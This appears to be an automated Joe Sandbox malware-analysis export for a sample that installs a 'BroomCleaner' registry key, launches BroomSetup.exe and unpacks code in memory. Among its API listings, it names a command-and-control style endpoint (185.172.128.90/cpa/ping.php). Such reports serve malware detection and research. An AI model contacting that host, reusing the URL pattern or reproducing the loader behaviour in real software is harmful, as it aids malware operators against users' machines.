                                                                                                                                                                                                                                  control_flow_graph 1438 4192ad-4192bd 1439 4192d7-4192d9 1438->1439 1440 4192bf-4192d2 call 41236e call 412381 1438->1440 1442 419641-41964e call 41236e call 412381 1439->1442 1443 4192df-4192e5 1439->1443 1457 419659 1440->1457 1462 419654 call 410905 1442->1462 1443->1442 1446 4192eb-419316 1443->1446 1446->1442 1449 41931c-419325 1446->1449 1452 419327-41933a call 41236e call 412381 1449->1452 1453 41933f-419341 1449->1453 1452->1462 1455 419347-41934b 1453->1455 1456 41963d-41963f 1453->1456 1455->1456 1461 419351-419355 1455->1461 1459 41965c-419661 1456->1459 1457->1459 1461->1452 1464 419357-41936e 1461->1464 1462->1457 1467 419370-419373 1464->1467 1468 41938b-419394 1464->1468 1469 419375-41937b 1467->1469 1470 41937d-419386 1467->1470 1471 4193b2-4193bc 1468->1471 1472 419396-4193ad call 41236e call 412381 call 410905 1468->1472 1469->1470 1469->1472 1475 419427-419441 1470->1475 1473 4193c3-4193e1 call 417a45 call 41629a * 2 1471->1473 1474 4193be-4193c0 1471->1474 1502 419574 1472->1502 1511 4193e3-4193f9 call 412381 call 41236e 1473->1511 1512 4193fe-419424 call 419800 1473->1512 1474->1473 1477 419515-41951e call 421229 1475->1477 1478 419447-419457 1475->1478 1489 419591 1477->1489 1490 419520-419532 1477->1490 1478->1477 1481 41945d-41945f 1478->1481 1481->1477 1487 419465-41948b 1481->1487 1487->1477 1492 419491-4194a4 1487->1492 1498 419595-4195ad ReadFile 1489->1498 1490->1489 1494 419534-419543 GetConsoleMode 1490->1494 1492->1477 1496 4194a6-4194a8 1492->1496 1494->1489 1501 419545-419549 1494->1501 1496->1477 1503 4194aa-4194d5 1496->1503 1499 419609-419614 GetLastError 1498->1499 1500 4195af-4195b5 1498->1500 1505 419616-419628 call 412381 call 41236e 1499->1505 1506 41962d-419630 1499->1506 1500->1499 1507 4195b7 1500->1507 1501->1498 1508 41954b-419565 ReadConsoleW 1501->1508 1509 419577-419581 call 41629a 1502->1509 1503->1477 1510 4194d7-4194ea 1503->1510 1505->1502 1518 419636-419638 1506->1518 1519 41956d-419573 call 41234b 1506->1519 1514 4195ba-4195cc 1507->1514 1516 419567 GetLastError 1508->1516 1517 419586-41958f 1508->1517 1509->1459 1510->1477 1521 4194ec-4194ee 1510->1521 1511->1502 1512->1475 1514->1509 1524 4195ce-4195d2 1514->1524 1516->1519 1517->1514 1518->1509 1519->1502 1521->1477 1528 4194f0-419510 1521->1528 1531 4195d4-4195e4 call 418fc9 1524->1531 1532 4195eb-4195f6 1524->1532 1528->1477 1543 4195e7-4195e9 1531->1543 1538 419602-419607 call 418e09 1532->1538 1539 4195f8 call 419119 1532->1539 1544 4195fd-419600 1538->1544 1539->1544 1543->1509 1544->1543
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 997ea1e074bed25bc4bbba2399cba16e5922d8a4b1bc8de6d13cd7412f5484b7
                                                                                                                                                                                                                                  • Instruction ID: 1de375e9a44cfea9a4e980cda881e291b4907b82d4d6a27c77cd479f01cc8893
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 997ea1e074bed25bc4bbba2399cba16e5922d8a4b1bc8de6d13cd7412f5484b7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCC12B71E04249AFDB11CFA9C851BEE7BB1BF19314F04019AE854B7392C7789D81CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BB003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1546 5bb003c-5bb0047 1547 5bb0049 1546->1547 1548 5bb004c-5bb0263 call 5bb0a3f call 5bb0e0f call 5bb0d90 VirtualAlloc 1546->1548 1547->1548 1563 5bb028b-5bb0292 1548->1563 1564 5bb0265-5bb0289 call 5bb0a69 1548->1564 1566 5bb02a1-5bb02b0 1563->1566 1568 5bb02ce-5bb03c2 VirtualProtect call 5bb0cce call 5bb0ce7 1564->1568 1566->1568 1569 5bb02b2-5bb02cc 1566->1569 1575 5bb03d1-5bb03e0 1568->1575 1569->1566 1576 5bb0439-5bb04b8 VirtualFree 1575->1576 1577 5bb03e2-5bb0437 call 5bb0ce7 1575->1577 1579 5bb04be-5bb04cd 1576->1579 1580 5bb05f4-5bb05fe 1576->1580 1577->1575 1582 5bb04d3-5bb04dd 1579->1582 1583 5bb077f-5bb0789 1580->1583 1584 5bb0604-5bb060d 1580->1584 1582->1580 1588 5bb04e3-5bb0505 LoadLibraryA 1582->1588 1586 5bb078b-5bb07a3 1583->1586 1587 5bb07a6-5bb07b0 1583->1587 1584->1583 1589 5bb0613-5bb0637 1584->1589 1586->1587 1590 5bb086e-5bb08be LoadLibraryA 1587->1590 1591 5bb07b6-5bb07cb 1587->1591 1592 5bb0517-5bb0520 1588->1592 1593 5bb0507-5bb0515 1588->1593 1594 5bb063e-5bb0648 1589->1594 1599 5bb08c7-5bb08f9 1590->1599 1595 5bb07d2-5bb07d5 1591->1595 1596 5bb0526-5bb0547 1592->1596 1593->1596 1594->1583 1597 5bb064e-5bb065a 1594->1597 1600 5bb07d7-5bb07e0 1595->1600 1601 5bb0824-5bb0833 1595->1601 1602 5bb054d-5bb0550 1596->1602 1597->1583 1598 5bb0660-5bb066a 1597->1598 1605 5bb067a-5bb0689 1598->1605 1607 5bb08fb-5bb0901 1599->1607 1608 5bb0902-5bb091d 1599->1608 1609 5bb07e2 1600->1609 1610 5bb07e4-5bb0822 1600->1610 1606 5bb0839-5bb083c 1601->1606 1603 5bb05e0-5bb05ef 1602->1603 1604 5bb0556-5bb056b 1602->1604 1603->1582 1611 5bb056f-5bb057a 1604->1611 1612 5bb056d 1604->1612 1613 5bb068f-5bb06b2 1605->1613 1614 5bb0750-5bb077a 1605->1614 1606->1590 1615 5bb083e-5bb0847 1606->1615 1607->1608 1609->1601 1610->1595 1616 5bb059b-5bb05bb 1611->1616 1617 5bb057c-5bb0599 1611->1617 1612->1603 1618 5bb06ef-5bb06fc 1613->1618 1619 5bb06b4-5bb06ed 1613->1619 1614->1594 1620 5bb084b-5bb086c 1615->1620 1621 5bb0849 1615->1621 1629 5bb05bd-5bb05db 1616->1629 1617->1629 1623 5bb074b 1618->1623 1624 5bb06fe-5bb0748 1618->1624 1619->1618 1620->1606 1621->1590 1623->1605 1624->1623 1629->1602
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 05BB024D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                  • Instruction ID: 2eb7f9c60bbe20443b1df861242a33580495443a7f783490d3c90b93042fdf50
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6526974A01229DFDB64CF58C984BADBBB1BF09304F1480D9E94DAB351DBB0AA95CF14
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042612F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1630 42612f-426166 call 4275a4 RegCreateKeyExA 1633 4261f7-4261fb 1630->1633 1634 42616c-42617f 1630->1634 1635 426206-426216 1633->1635 1636 4261fd-426200 RegCloseKey 1633->1636 1637 426182-426187 1634->1637 1636->1635 1637->1637 1638 426189-4261a8 call 402c71 1637->1638 1641 4261ab-4261b0 1638->1641 1641->1641 1642 4261b2-4261ea call 402c71 RegSetValueExA call 402bef 1641->1642 1646 4261ef-4261f2 call 402bef 1642->1646 1646->1633
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00426134
                                                                                                                                                                                                                                  • RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043CE50,SOFTWARE\BroomCleaner), ref: 0042615C
                                                                                                                                                                                                                                  • RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,?,0043CE50,0043CE51,Installed,Installed), ref: 004261DF
                                                                                                                                                                                                                                  • RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426200
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateH_prologValue
                                                                                                                                                                                                                                  • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                                  • API String ID: 1996196666-529226407
                                                                                                                                                                                                                                  • Opcode ID: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
                                                                                                                                                                                                                                  • Instruction ID: 58fc235232bf4dd8c125a8bac87f810df134f3da6f2bb4c7cb0ac5f6772b16af
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47319A71A00229AFDF149FA8DC949FEBB79FB48358F44412EE802B7291C7B55E05CB64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00426260 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1648 426260-42626f 1649 426271-426277 1648->1649 1649->1649 1650 426279-4262ac ShellExecuteExA 1649->1650 1651 4262c5-4262d1 call 402bef 1650->1651 1652 4262ae-4262bf WaitForSingleObject CloseHandle 1650->1652 1652->1651
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteExA.SHELL32(?,/BroomSetup.exe), ref: 004262A2
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 004262B6
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004262BF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                                  • String ID: /BroomSetup.exe
                                                                                                                                                                                                                                  • API String ID: 3837156514-1897133622
                                                                                                                                                                                                                                  • Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                  • Instruction ID: f0609d10c970eb56ece5b35627df0b7ec36997a903e398cb54ca8c4de5c5ad66
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66017C31E00218EBDF25EF69E9459DDBBB8EF08310F41812AF805A6260EB709A45CF94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004163FD Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1655 4163fd-416411 call 41e97a 1658 416413-416415 1655->1658 1659 416417-41641f 1655->1659 1660 416465-416485 call 41e8e9 1658->1660 1661 416421-416428 1659->1661 1662 41642a-41642d 1659->1662 1670 416493 1660->1670 1671 416487-416491 call 41234b 1660->1671 1661->1662 1663 416435-416449 call 41e97a * 2 1661->1663 1664 41644b-41645b call 41e97a FindCloseChangeNotification 1662->1664 1665 41642f-416433 1662->1665 1663->1658 1663->1664 1664->1658 1677 41645d-416463 GetLastError 1664->1677 1665->1663 1665->1664 1675 416495-416498 1670->1675 1671->1675 1677->1660
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 00416453
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 0041645D
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00416488
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 490808831-0
                                                                                                                                                                                                                                  • Opcode ID: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
                                                                                                                                                                                                                                  • Instruction ID: aa9397e3c223395acf83e04721932d84fcb93a289d6ab5d19588dbc87750978f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F016B33A101201AD6355675A8457FF2B494B82B38F27016FFC18972D1DF6CDCC6469D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00419767 Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1680 419767-41977f call 41e97a 1683 419781-419786 call 412381 1680->1683 1684 419792-4197a8 SetFilePointerEx 1680->1684 1690 41978c-419790 1683->1690 1685 4197b9-4197c3 1684->1685 1686 4197aa-4197b7 GetLastError call 41234b 1684->1686 1689 4197c5-4197da 1685->1689 1685->1690 1686->1690 1692 4197df-4197e4 1689->1692 1690->1692
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 004197B1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2336955059-0
                                                                                                                                                                                                                                  • Opcode ID: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
                                                                                                                                                                                                                                  • Instruction ID: aba61adf325f610bb64cc2fd6d97dc3a8945be917003060b225fa659b6e0b810
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E012D37B20119ABCB159F99DC059EE7B19DF85330B28024EFC21972D0EA749C918798
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00426217 Relevance: 4.5, APIs: 3, Instructions: 35fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1694 426217-42623c CreateFileA 1695 426259-42625f 1694->1695 1696 42623e-426253 WriteFile FindCloseChangeNotification 1694->1696 1696->1695
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,00002000,00000000,?,?,0042588E,00000001,?,00002000), ref: 00426232
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,00002000,00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042624A
                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNEL32(00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426253
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3805958096-0
                                                                                                                                                                                                                                  • Opcode ID: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
                                                                                                                                                                                                                                  • Instruction ID: 926e9ac1e5f1aba45008a0d26bda579428ca80e0843417663d772dc166ed892d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73E06572701120BBD7351B99AC48FABBE6DEF856F0F050169FB01E21109A61DC0197B4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401BB2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1705 401bb2-401c21 call 4275a4 call 40307c call 402fe5 call 402f6b 1714 401c51-401c61 1705->1714 1715 401c23-401c47 1705->1715 1715->1714 1716 401c49-401c4c call 40187f 1715->1716 1716->1714
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                    • Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081
                                                                                                                                                                                                                                    • Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                    • Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                    • Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                    • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                    • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
                                                                                                                                                                                                                                  • String ID: v*@
                                                                                                                                                                                                                                  • API String ID: 3966877926-3062513736
                                                                                                                                                                                                                                  • Opcode ID: 75af08b354eb886bb40f1edcec266cde64058157f3a774df709a09292bb85848
                                                                                                                                                                                                                                  • Instruction ID: b9e6d0c04dc114dbe46ca1cb3692bd7dbb1da951860286197dc681cf7a8c4379
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75af08b354eb886bb40f1edcec266cde64058157f3a774df709a09292bb85848
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E82190B1711206AFD708DF59C889A6AF7F9FF48348F14826EE115A7341C7B8DE008B94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00425EE2 Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00425EE7
                                                                                                                                                                                                                                    • Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                    • Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog$Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 420165198-0
                                                                                                                                                                                                                                  • Opcode ID: b93ceea2ca49065fabeb8f5add2c04d8e46cbf417997cc66e17ce7118fc6a16a
                                                                                                                                                                                                                                  • Instruction ID: 8b308e217030a11e536693c7e770bb36c60ea871e1947f1e620e0115d8c257f2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b93ceea2ca49065fabeb8f5add2c04d8e46cbf417997cc66e17ce7118fc6a16a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B311570D01119EBDB14EF95E985AEDFBB4BF48304F1080AEE805B3681EB786A04CB64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0411CCD6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1742 411ccd6-411ccef 1743 411ccf1-411ccf3 1742->1743 1744 411ccf5 1743->1744 1745 411ccfa-411cd06 CreateToolhelp32Snapshot 1743->1745 1744->1745 1746 411cd16-411cd23 Module32First 1745->1746 1747 411cd08-411cd0e 1745->1747 1748 411cd25-411cd26 call 411c995 1746->1748 1749 411cd2c-411cd34 1746->1749 1747->1746 1754 411cd10-411cd14 1747->1754 1752 411cd2b 1748->1752 1752->1749 1754->1743 1754->1746
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0411CCFE
                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 0411CD1E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255300318.000000000411C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0411C000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_411c000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                  • Instruction ID: af5d49c0c14a0e2069e601176b10ed4d70ece5b4a171f6216c786f76301c61d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DBF062311407156BEB203BF998CDBAA76E9EF89665F100578E643A20D0EB70F84686A1
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BB0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
